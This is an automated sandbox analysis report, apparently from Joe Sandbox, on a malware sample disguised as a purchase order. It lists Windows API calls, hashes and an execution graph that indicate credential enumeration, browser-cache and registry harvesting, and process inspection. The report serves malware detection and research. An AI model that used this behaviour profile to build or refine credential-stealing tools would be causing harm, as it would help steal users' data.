                                                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: nsa
                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 004056D6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                                                                      • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                                                                      • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                                                                      • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                                                                      • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                                                                      • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                                                                      • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                                                                      • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:6.2%
                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                      Signature Coverage:3.2%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:74
                                                                                                      execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 39954 4147f3 39957 414561 39954->39957 39956 414813 39958 41456d 39957->39958 39959 41457f GetPrivateProfileIntW 39957->39959 39962 4143f1 memset _itow WritePrivateProfileStringW 39958->39962 39959->39956 39961 41457a 39961->39956 39962->39961 37634 4287c1 37635 4287d2 37634->37635 37638 429ac1 37634->37638 37639 428818 37635->37639 37640 42881f 37635->37640 37649 425711 37635->37649 37636 4259da 37697 416760 11 API calls 37636->37697 37668 425ad6 37638->37668 37704 415c56 11 API calls 37638->37704 37671 42013a 37639->37671 37699 420244 97 API calls 37640->37699 37642 4260dd 37698 424251 120 API calls 37642->37698 37645 4259c2 37645->37668 37691 415c56 11 API calls 37645->37691 37649->37636 37649->37638 37649->37645 37652 429a4d 37649->37652 37655 422aeb memset memcpy memcpy 37649->37655 37659 4260a1 37649->37659 37667 425a38 37649->37667 37687 4227f0 memset memcpy 37649->37687 37688 422b84 15 API calls 37649->37688 37689 422b5d memset memcpy memcpy 37649->37689 37690 422640 13 API calls 37649->37690 37692 4241fc 11 API calls 37649->37692 37693 42413a 90 API calls 37649->37693 37653 429a66 37652->37653 37654 429a9b 37652->37654 37700 415c56 11 API calls 37653->37700 37658 429a96 37654->37658 37702 416760 11 API calls 37654->37702 37655->37649 37703 424251 120 API calls 37658->37703 37696 415c56 11 API calls 37659->37696 37661 429a7a 37701 416760 11 API calls 37661->37701 37667->37645 37694 422640 13 API calls 37667->37694 37695 4226e0 12 API calls 37667->37695 37672 42014c 37671->37672 37675 420151 37671->37675 37714 41e466 97 API calls 37672->37714 37674 420162 37674->37649 37675->37674 37676 4201b3 37675->37676 37677 420229 37675->37677 37678 4201b8 37676->37678 37679 4201dc 37676->37679 37677->37674 37680 41fd5e 86 API calls 37677->37680 37705 41fbdb 
37678->37705 37679->37674 37683 4201ff 37679->37683 37711 41fc4c 37679->37711 37680->37674 37683->37674 37686 42013a 97 API calls 37683->37686 37686->37674 37687->37649 37688->37649 37689->37649 37690->37649 37691->37636 37692->37649 37693->37649 37694->37667 37695->37667 37696->37636 37697->37642 37698->37668 37699->37649 37700->37661 37701->37658 37702->37658 37703->37638 37704->37636 37706 41fbf1 37705->37706 37707 41fbf8 37705->37707 37710 41fc39 37706->37710 37729 4446ce 11 API calls 37706->37729 37719 41ee26 37707->37719 37710->37674 37715 41fd5e 37710->37715 37712 41ee6b 86 API calls 37711->37712 37713 41fc5d 37712->37713 37713->37679 37714->37675 37718 41fd65 37715->37718 37716 41fdab 37716->37674 37717 41fbdb 86 API calls 37717->37718 37718->37716 37718->37717 37720 41ee41 37719->37720 37721 41ee32 37719->37721 37730 41edad 37720->37730 37733 4446ce 11 API calls 37721->37733 37724 41ee3c 37724->37706 37727 41ee58 37727->37724 37735 41ee6b 37727->37735 37729->37710 37739 41be52 37730->37739 37733->37724 37734 41eb85 11 API calls 37734->37727 37736 41ee70 37735->37736 37737 41ee78 37735->37737 37795 41bf99 86 API calls 37736->37795 37737->37724 37740 41be6f 37739->37740 37741 41be5f 37739->37741 37746 41be8c 37740->37746 37760 418c63 37740->37760 37774 4446ce 11 API calls 37741->37774 37743 41be69 37743->37724 37743->37734 37746->37743 37747 41bf3a 37746->37747 37749 41bed1 37746->37749 37751 41bee7 37746->37751 37777 4446ce 11 API calls 37747->37777 37750 41bef0 37749->37750 37753 41bee2 37749->37753 37750->37751 37752 41bf01 37750->37752 37751->37743 37778 41a453 86 API calls 37751->37778 37754 41bf24 memset 37752->37754 37756 41bf14 37752->37756 37775 418a6d memset memcpy memset 37752->37775 37764 41ac13 37753->37764 37754->37743 37776 41a223 memset memcpy memset 37756->37776 37759 41bf20 37759->37754 37762 418c72 37760->37762 37761 418c94 37761->37746 37762->37761 37763 418d51 memset memset 37762->37763 37763->37761 37765 41ac3f memset 37764->37765 37766 
41ac52 37764->37766 37771 41acd9 37765->37771 37768 41ac6a 37766->37768 37779 41dc14 19 API calls 37766->37779 37769 41aca1 37768->37769 37780 41519d 37768->37780 37769->37771 37772 41acc0 memset 37769->37772 37773 41accd memcpy 37769->37773 37771->37751 37772->37771 37773->37771 37774->37743 37775->37756 37776->37759 37777->37751 37779->37768 37783 4175ed 37780->37783 37791 417570 SetFilePointer 37783->37791 37786 41760a ReadFile 37787 417637 37786->37787 37788 417627 GetLastError 37786->37788 37789 4151b3 37787->37789 37790 41763e memset 37787->37790 37788->37789 37789->37769 37790->37789 37792 41759c GetLastError 37791->37792 37794 4175b2 37791->37794 37793 4175a8 GetLastError 37792->37793 37792->37794 37793->37794 37794->37786 37794->37789 37795->37737 39963 44def7 39964 44df07 39963->39964 39965 44df00 ??3@YAXPAX 39963->39965 39966 44df17 39964->39966 39967 44df10 ??3@YAXPAX 39964->39967 39965->39964 39968 44df27 39966->39968 39969 44df20 ??3@YAXPAX 39966->39969 39967->39966 39970 44df37 39968->39970 39971 44df30 ??3@YAXPAX 39968->39971 39969->39968 39971->39970 37796 417bc5 37797 417c61 37796->37797 37798 417bda 37796->37798 37798->37797 37799 417bf6 UnmapViewOfFile CloseHandle 37798->37799 37801 417c2c 37798->37801 37803 4175b7 37798->37803 37799->37798 37799->37799 37801->37798 37808 41851e 20 API calls 37801->37808 37804 4175d6 CloseHandle 37803->37804 37805 4175c8 37804->37805 37806 4175df 37804->37806 37805->37806 37807 4175ce Sleep 37805->37807 37806->37798 37807->37804 37808->37801 37809 4152c7 malloc 37810 4152ef 37809->37810 37812 4152e2 37809->37812 37813 416760 11 API calls 37810->37813 37813->37812 39972 4148b6 FindResourceW 39973 4148cf SizeofResource 39972->39973 39976 4148f9 39972->39976 39974 4148e0 LoadResource 39973->39974 39973->39976 39975 4148ee LockResource 39974->39975 39974->39976 39975->39976 37814 415308 free 39977 441b3f 39987 43a9f6 39977->39987 39979 441b61 40160 4386af memset 39979->40160 39981 44189a 39982 442bd4 39981->39982 
39983 4418e2 39981->39983 39984 4418ea 39982->39984 40162 441409 memset 39982->40162 39983->39984 40161 4414a9 12 API calls 39983->40161 39988 43aa20 39987->39988 39989 43aadf 39987->39989 39988->39989 39990 43aa34 memset 39988->39990 39989->39979 39991 43aa56 39990->39991 39992 43aa4d 39990->39992 40163 43a6e7 39991->40163 40171 42c02e memset 39992->40171 39997 43aad3 40173 4169a7 11 API calls 39997->40173 39998 43aaae 39998->39989 39998->39997 40013 43aae5 39998->40013 40000 43ac18 40002 43ac47 40000->40002 40175 42bbd5 memcpy memcpy memcpy memset memcpy 40000->40175 40003 43aca8 40002->40003 40176 438eed 16 API calls 40002->40176 40007 43acd5 40003->40007 40178 4233ae 11 API calls 40003->40178 40006 43ac87 40177 4233c5 16 API calls 40006->40177 40179 423426 11 API calls 40007->40179 40011 43ace1 40180 439811 163 API calls 40011->40180 40012 43a9f6 161 API calls 40012->40013 40013->39989 40013->40000 40013->40012 40174 439bbb 22 API calls 40013->40174 40015 43acfd 40021 43ad2c 40015->40021 40181 438eed 16 API calls 40015->40181 40017 43ad19 40182 4233c5 16 API calls 40017->40182 40019 43ad58 40183 44081d 163 API calls 40019->40183 40021->40019 40023 43add9 40021->40023 40023->40023 40187 423426 11 API calls 40023->40187 40024 43ae3a memset 40025 43ae73 40024->40025 40188 42e1c0 147 API calls 40025->40188 40026 43adab 40185 438c4e 163 API calls 40026->40185 40028 43ad6c 40028->39989 40028->40026 40184 42370b memset memcpy memset 40028->40184 40030 43ae96 40189 42e1c0 147 API calls 40030->40189 40032 43adcc 40186 440f84 12 API calls 40032->40186 40035 43aea8 40036 43aec1 40035->40036 40190 42e199 147 API calls 40035->40190 40038 43af00 40036->40038 40191 42e1c0 147 API calls 40036->40191 40038->39989 40041 43af1a 40038->40041 40042 43b3d9 40038->40042 40192 438eed 16 API calls 40041->40192 40047 43b3f6 40042->40047 40054 43b4c8 40042->40054 40044 43b60f 40044->39989 40251 4393a5 17 API calls 40044->40251 40045 43af2f 40193 4233c5 16 API calls 40045->40193 40233 
432878 12 API calls 40047->40233 40049 43af51 40194 423426 11 API calls 40049->40194 40052 43af7d 40195 423426 11 API calls 40052->40195 40053 43b4f2 40240 43a76c 21 API calls 40053->40240 40054->40053 40239 42bbd5 memcpy memcpy memcpy memset memcpy 40054->40239 40058 43b529 40241 44081d 163 API calls 40058->40241 40059 43b428 40087 43b462 40059->40087 40234 432b60 16 API calls 40059->40234 40060 43af94 40196 423330 11 API calls 40060->40196 40064 43b47e 40067 43b497 40064->40067 40236 42374a memcpy memset memcpy memcpy memcpy 40064->40236 40065 43b544 40075 43b55c 40065->40075 40242 42c02e memset 40065->40242 40066 43afca 40197 423330 11 API calls 40066->40197 40237 4233ae 11 API calls 40067->40237 40072 43afdb 40198 4233ae 11 API calls 40072->40198 40074 43b4b1 40238 423399 11 API calls 40074->40238 40243 43a87a 163 API calls 40075->40243 40077 43b56c 40080 43b58a 40077->40080 40244 423330 11 API calls 40077->40244 40079 43afee 40199 44081d 163 API calls 40079->40199 40245 440f84 12 API calls 40080->40245 40082 43b4c1 40247 42db80 163 API calls 40082->40247 40086 43b592 40246 43a82f 16 API calls 40086->40246 40235 423330 11 API calls 40087->40235 40090 43b5b4 40248 438c4e 163 API calls 40090->40248 40092 43b5cf 40249 42c02e memset 40092->40249 40094 43b005 40094->39989 40099 43b01f 40094->40099 40200 42d836 163 API calls 40094->40200 40095 43b1ef 40210 4233c5 16 API calls 40095->40210 40097 43b212 40211 423330 11 API calls 40097->40211 40099->40095 40208 423330 11 API calls 40099->40208 40209 42d71d 163 API calls 40099->40209 40101 43add4 40101->40044 40250 438f86 16 API calls 40101->40250 40104 43b087 40201 4233ae 11 API calls 40104->40201 40105 43b22a 40212 42ccb5 11 API calls 40105->40212 40108 43b10f 40204 423330 11 API calls 40108->40204 40109 43b23f 40213 4233ae 11 API calls 40109->40213 40111 43b257 40214 4233ae 11 API calls 40111->40214 40115 43b129 40205 4233ae 11 API calls 40115->40205 40116 43b26e 40215 4233ae 11 API calls 40116->40215 40118 43b09a 
40118->40108 40202 42cc15 19 API calls 40118->40202 40203 4233ae 11 API calls 40118->40203 40120 43b282 40216 43a87a 163 API calls 40120->40216 40122 43b13c 40206 440f84 12 API calls 40122->40206 40124 43b29d 40217 423330 11 API calls 40124->40217 40127 43b15f 40207 4233ae 11 API calls 40127->40207 40128 43b2af 40130 43b2b8 40128->40130 40131 43b2ce 40128->40131 40218 4233ae 11 API calls 40130->40218 40219 440f84 12 API calls 40131->40219 40134 43b2c9 40221 4233ae 11 API calls 40134->40221 40135 43b2da 40220 42370b memset memcpy memset 40135->40220 40138 43b2f9 40222 423330 11 API calls 40138->40222 40140 43b30b 40223 423330 11 API calls 40140->40223 40142 43b325 40224 423399 11 API calls 40142->40224 40144 43b332 40225 4233ae 11 API calls 40144->40225 40146 43b354 40226 423399 11 API calls 40146->40226 40148 43b364 40227 43a82f 16 API calls 40148->40227 40150 43b370 40228 42db80 163 API calls 40150->40228 40152 43b380 40229 438c4e 163 API calls 40152->40229 40154 43b39e 40230 423399 11 API calls 40154->40230 40156 43b3ae 40231 43a76c 21 API calls 40156->40231 40158 43b3c3 40232 423399 11 API calls 40158->40232 40160->39981 40161->39984 40162->39982 40164 43a6f5 40163->40164 40170 43a765 40163->40170 40164->40170 40252 42a115 40164->40252 40168 43a73d 40169 42a115 147 API calls 40168->40169 40168->40170 40169->40170 40170->39989 40172 4397fd memset 40170->40172 40171->39991 40172->39998 40173->39989 40174->40013 40175->40002 40176->40006 40177->40003 40178->40007 40179->40011 40180->40015 40181->40017 40182->40021 40183->40028 40184->40026 40185->40032 40186->40101 40187->40024 40188->40030 40189->40035 40190->40036 40191->40036 40192->40045 40193->40049 40194->40052 40195->40060 40196->40066 40197->40072 40198->40079 40199->40094 40200->40104 40201->40118 40202->40118 40203->40118 40204->40115 40205->40122 40206->40127 40207->40099 40208->40099 40209->40099 40210->40097 40211->40105 40212->40109 40213->40111 40214->40116 40215->40120 40216->40124 40217->40128 
[Execution graph: interactive call-graph widget not rendered in text. The extracted node/edge data (node ids, function addresses, per-node API call counts) is omitted here.]

API calls named on the graph nodes include: LoadLibraryW, GetProcAddress, FreeLibrary; CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, GetCurrentProcess, DuplicateHandle; CredEnumerateW, LocalFree; FindFirstUrlCacheEntryW, FindNextUrlCacheEntryW, FindCloseUrlCache; RegOpenKeyExW, RegQueryValueExW, RegEnumValueW, RegCloseKey; GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW; FindFirstFileW, FindNextFileW, FindClose, GetFileAttributesW, CreateFileW, CopyFileW, DeleteFileW, GetTempPathW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, WriteFile, ReadFile, SetFilePointerEx, GetFileSize; SHGetSpecialFolderPathW, GetModuleFileNameW, GetSystemDirectoryW, GetVersionExW; FindResourceW, LoadResource, SizeofResource, LockResource, EnumResourceTypesW, EnumResourceNamesW; MultiByteToWideChar, WideCharToMultiByte, SystemTimeToFileTime, FileTimeToLocalFileTime; CoInitialize, CoUninitialize, CoTaskMemFree, RegisterClassW, CreateWindowExW, ShowWindow, UpdateWindow, GetMessageW, TranslateMessage, DispatchMessageW, IsDialogMessageW, SendMessageW, LoadStringW, LoadIconW, LoadCursorW, SetCursor, CreateFontIndirectW, MessageBoxW, GetWindowPlacement, SetWindowPlacement, GetSystemMetrics, SetErrorMode, GetLastError.
39038->39050 39051 40e416 memcpy 39038->39051 39052 40e431 memcpy 39038->39052 39115 406e8f 13 API calls 39038->39115 39116 40dd50 _wcsicmp 39038->39116 39125 40742e 8 API calls 39038->39125 39126 406b53 SetFilePointerEx ReadFile 39038->39126 39040 40aa04 free 39039->39040 39041 40e491 39040->39041 39041->39033 39043 40e497 free 39041->39043 39042->39038 39043->39033 39045 40e376 memset 39117 40aa29 39045->39117 39048->39038 39049->39038 39050->39038 39051->39038 39052->39038 39053->38968 39055 406294 CloseHandle 39054->39055 39056 406224 39055->39056 39057 4096c3 CreateFileW 39056->39057 39058 40622d 39057->39058 39059 406281 GetLastError 39058->39059 39060 40a2ef ReadFile 39058->39060 39064 40625a 39059->39064 39061 406244 39060->39061 39061->39059 39062 40624b 39061->39062 39063 406777 19 API calls 39062->39063 39062->39064 39063->39064 39064->38990 39065 40dd85 memset 39064->39065 39066 409bca GetModuleFileNameW 39065->39066 39067 40ddbe CreateFileW 39066->39067 39070 40ddf1 39067->39070 39068 40afcf ??2@YAPAXI ??3@YAXPAX 39068->39070 39069 41352f 9 API calls 39069->39070 39070->39068 39070->39069 39071 40de0b NtQuerySystemInformation 39070->39071 39072 40de3b CloseHandle GetCurrentProcessId 39070->39072 39071->39070 39073 40de54 39072->39073 39074 413d4c 46 API calls 39073->39074 39082 40de88 39074->39082 39075 40e00c 39076 413d29 free FreeLibrary 39075->39076 39077 40e014 39076->39077 39077->38990 39077->38993 39078 40dea9 _wcsicmp 39079 